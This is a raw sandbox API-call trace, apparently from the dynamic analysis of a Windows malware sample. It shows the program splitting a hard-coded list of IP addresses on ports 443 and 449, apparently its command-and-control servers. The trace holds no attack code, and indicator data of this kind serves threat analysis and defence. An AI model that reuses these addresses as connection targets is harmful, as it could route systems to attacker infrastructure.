	[0102.269] lstrcpynW (in: lpString1=0x2456d8, lpString2="85.209.162.216:443", iMaxLength=15 | out: lpString1="85.209.162.216") returned="85.209.162.216"
	[0102.269] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.270] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.270] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245700
	[0102.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.270] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.270] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245020, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="85.209.162.217:443") returned 19
	[0102.270] StrStrIW (lpFirst="85.209.162.217:443", lpSrch=":") returned=":443"
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.270] lstrcpynW (in: lpString1=0x2456d8, lpString2="85.209.162.217:443", iMaxLength=15 | out: lpString1="85.209.162.217") returned="85.209.162.217"
	[0102.270] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.270] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.270] lstrcpynW (in: lpString1=0x248940, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245728
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.271] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245048, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.271] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245048, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="51.38.101.194:443") returned 18
	[0102.271] StrStrIW (lpFirst="51.38.101.194:443", lpSrch=":") returned=":443"
	[0102.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.271] lstrcpynW (in: lpString1=0x2456d8, lpString2="51.38.101.194:443", iMaxLength=14 | out: lpString1="51.38.101.194") returned="51.38.101.194"
	[0102.271] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.271] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.271] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245750
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.271] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.271] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245070, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0102.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.272] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245070, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=17 | out: lpWideCharStr="51.77.92.215:443") returned 17
	[0102.272] StrStrIW (lpFirst="51.77.92.215:443", lpSrch=":") returned=":443"
	[0102.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.272] lstrcpynW (in: lpString1=0x2456d8, lpString2="51.77.92.215:443", iMaxLength=13 | out: lpString1="51.77.92.215") returned="51.77.92.215"
	[0102.272] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.272] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.272] lstrcpynW (in: lpString1=0x248940, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245778
	[0102.272] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.272] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.272] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.272] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.272] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.272] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245098, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="31.131.20.125:443") returned 18
	[0102.272] StrStrIW (lpFirst="31.131.20.125:443", lpSrch=":") returned=":443"
	[0102.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.273] lstrcpynW (in: lpString1=0x2456d8, lpString2="31.131.20.125:443", iMaxLength=14 | out: lpString1="31.131.20.125") returned="31.131.20.125"
	[0102.273] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.273] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.273] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2457a0
	[0102.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.273] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.273] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2450c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.273] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.273] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2450c0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="85.143.219.128:443") returned 19
	[0102.273] StrStrIW (lpFirst="85.143.219.128:443", lpSrch=":") returned=":443"
	[0102.274] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.274] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.274] lstrcpynW (in: lpString1=0x2456d8, lpString2="85.143.219.128:443", iMaxLength=15 | out: lpString1="85.143.219.128") returned="85.143.219.128"
	[0102.274] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.274] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.274] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.274] lstrcpynW (in: lpString1=0x248940, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.274] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246c00
	[0102.274] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.275] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2450e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.275] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.275] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2450e8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="89.223.29.122:443") returned 18
	[0102.275] StrStrIW (lpFirst="89.223.29.122:443", lpSrch=":") returned=":443"
	[0102.275] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.275] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.275] lstrcpynW (in: lpString1=0x2456d8, lpString2="89.223.29.122:443", iMaxLength=14 | out: lpString1="89.223.29.122") returned="89.223.29.122"
	[0102.275] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.275] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.275] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.275] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.275] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24b9c0
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.275] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.275] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0102.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.276] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245110, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=17 | out: lpWideCharStr="193.0.178.20:443") returned 17
	[0102.276] StrStrIW (lpFirst="193.0.178.20:443", lpSrch=":") returned=":443"
	[0102.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.276] lstrcpynW (in: lpString1=0x2456d8, lpString2="193.0.178.20:443", iMaxLength=13 | out: lpString1="193.0.178.20") returned="193.0.178.20"
	[0102.276] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.276] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.276] lstrcpynW (in: lpString1=0x248940, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24b9e8
	[0102.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.276] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245138, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0102.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.276] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245138, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=17 | out: lpWideCharStr="185.251.39.2:443") returned 17
	[0102.276] StrStrIW (lpFirst="185.251.39.2:443", lpSrch=":") returned=":443"
	[0102.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.277] lstrcpynW (in: lpString1=0x2456d8, lpString2="185.251.39.2:443", iMaxLength=13 | out: lpString1="185.251.39.2") returned="185.251.39.2"
	[0102.277] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.277] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.277] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24ba10
	[0102.277] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.277] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.277] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.277] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.277] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.277] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245160, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="192.227.232.63:443") returned 19
	[0102.277] StrStrIW (lpFirst="192.227.232.63:443", lpSrch=":") returned=":443"
	[0102.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.278] lstrcpynW (in: lpString1=0x2456d8, lpString2="192.227.232.63:443", iMaxLength=15 | out: lpString1="192.227.232.63") returned="192.227.232.63"
	[0102.278] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.278] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.278] lstrcpynW (in: lpString1=0x248940, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24ba38
	[0102.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.278] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.278] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245188, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="195.123.209.19:443") returned 19
	[0102.278] StrStrIW (lpFirst="195.123.209.19:443", lpSrch=":") returned=":443"
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.279] lstrcpynW (in: lpString1=0x2456d8, lpString2="195.123.209.19:443", iMaxLength=15 | out: lpString1="195.123.209.19") returned="195.123.209.19"
	[0102.279] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.279] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.279] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24ba60
	[0102.279] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.279] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.279] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.279] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.279] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2451b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.279] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2451b0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="173.247.238.184:443") returned 20
	[0102.279] StrStrIW (lpFirst="173.247.238.184:443", lpSrch=":") returned=":443"
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.280] lstrcpynW (in: lpString1=0x2456d8, lpString2="173.247.238.184:443", iMaxLength=16 | out: lpString1="173.247.238.184") returned="173.247.238.184"
	[0102.280] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.280] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.280] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.280] lstrcpynW (in: lpString1=0x248940, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.280] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24ba88
	[0102.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.280] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2451d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.280] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.280] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2451d8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="195.123.240.58:443") returned 19
	[0102.280] StrStrIW (lpFirst="195.123.240.58:443", lpSrch=":") returned=":443"
	[0102.280] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.280] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.280] lstrcpynW (in: lpString1=0x2456d8, lpString2="195.123.240.58:443", iMaxLength=15 | out: lpString1="195.123.240.58") returned="195.123.240.58"
	[0102.280] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0102.281] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.281] lstrcpynW (in: lpString1=0x248928, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0102.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bab0
	[0102.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.281] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.281] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245200, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="200.122.209.78:449") returned 19
	[0102.281] StrStrIW (lpFirst="200.122.209.78:449", lpSrch=":") returned=":449"
	[0102.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.281] lstrcpynW (in: lpString1=0x2456d8, lpString2="200.122.209.78:449", iMaxLength=15 | out: lpString1="200.122.209.78") returned="200.122.209.78"
	[0102.281] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.281] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0102.282] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bad8
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.282] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5a8
	[0102.282] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245228, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=17 | out: lpWideCharStr="200.54.14.61:449") returned 17
	[0102.282] StrStrIW (lpFirst="200.54.14.61:449", lpSrch=":") returned=":449"
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2456d8
	[0102.282] lstrcpynW (in: lpString1=0x2456d8, lpString2="200.54.14.61:449", iMaxLength=13 | out: lpString1="200.54.14.61") returned="200.54.14.61"
	[0102.282] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.282] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248928
	[0102.282] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24bb00
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
